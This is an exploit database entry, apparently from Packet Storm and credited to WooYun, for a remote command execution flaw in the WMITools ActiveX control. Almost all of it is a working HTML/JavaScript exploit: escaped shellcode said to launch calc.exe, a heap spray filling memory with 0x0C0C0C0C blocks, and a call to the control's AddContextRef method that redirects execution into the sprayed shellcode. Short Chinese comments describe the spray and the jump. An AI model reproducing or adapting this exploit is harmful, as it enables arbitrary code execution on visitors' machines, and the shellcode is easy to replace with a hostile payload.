WMITools Active-X Remote Command Execution

2010-12-22T00:00:00
ID PACKETSTORM:96944
Type packetstorm
Reporter WooYun
Modified 2010-12-22T00:00:00

Description

                                        
                                            `<html>  
  
<object classid="clsid:2745E5F5-D234-11D0-847A-00C04FD7BB08" id="target"></object>  
  
  
  
<SCRIPT language="JavaScript">  
  
//run calc.exe  
  
var shellcode = unescape("%uc92b%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u0c13%u452b%u83df%ufceb%uf4e2%uc3f0%udf01%u2b0c%u9ace%ua030%uda39%u2a74%u54aa%u3343%u80ce%u2a2c%u96ae%u1f87%udece%u1ae2%u4685%uafa0%uab85%uea0b%ud28f%ue90d%u2bae%u7f37%udb61%uce79%u80ce%u2a28%ub9ae%u2787%u540e%u3753%u3444%u3787%udece%ua2e7%ufb19%ue808%u1f74%ua068%uef05%ueb89%ud33d%u6b87%u5449%u377c%u54e8%u2364%ud6ae%uab87%udff5%u2b0c%ub7ce%u7430%u2974%u7d6c%u27cc%ueb8f%u8f3e%udb64%udbcf%u4353%u21dd%u2586%u2012%u48eb%ub324%u2b6f%udf45%u0000");  
  
  
  
//先喷好堆  
  
var bigblock = unescape("%u0C0C%u0C0C");  
  
var headersize = 20;  
  
var slackspace = headersize+shellcode.length;  
  
while (bigblock.length<slackspace) bigblock+=bigblock;  
  
fillblock = bigblock.substring(0, slackspace);  
  
block = bigblock.substring(0, bigblock.length-slackspace);  
  
while(block.length+slackspace<0x40000) block = block+block+fillblock;  
  
memory = new Array();  
  
for (x=0; x<350; x++) memory[x] = block +shellcode;  
  
  
  
//让程序直接call过去  
  
target.AddContextRef(0x0c0c0c0c);  
  
</script>  
  
</html>  
  
`